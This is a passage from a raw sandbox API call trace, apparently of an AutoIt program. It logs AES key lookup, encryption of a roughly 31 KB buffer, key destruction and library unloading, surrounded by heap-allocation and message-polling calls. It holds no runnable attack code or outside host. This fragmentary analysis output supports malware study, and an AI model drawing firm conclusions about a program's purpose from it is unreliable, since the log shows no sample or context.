wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.543] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0168.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.544] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0168.544] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.544] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.544] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.545] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0168.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.545] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0168.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.546] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.546] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0168.546] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0168.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.547] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.547] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.547] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.547] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.547] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.547] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.547] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.548] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.548] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.548] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.548] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x7952, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x7960) returned 1 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.548] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.549] CharLowerBuffW (in: lpsz="byte[31073]", cchLength=0xb | out: lpsz="byte[31073]") returned 0xb [0168.549] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.549] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.549] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.549] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9e4448*, pdwDataLen=0x87e820*=0x7952, dwBufLen=0x7960 | out: pbData=0x9e4448*, pdwDataLen=0x87e820*=0x7960) returned 1 [0168.549] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.550] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.550] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.550] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.550] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.550] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.570] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.570] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.570] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0168.570] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.570] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.570] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0168.570] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.570] CryptDestroyKey (hKey=0x90af18) returned 1 [0168.572] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.572] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.572] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.572] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.572] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.572] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.572] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.572] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.573] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.573] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.573] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.573] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.573] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.573] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.573] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.573] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.573] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.573] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0168.573] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.574] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0168.574] FreeLibrary (hLibModule=0x74f20000) returned 1 [0168.574] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.574] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.577] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.577] CharUpperBuffW 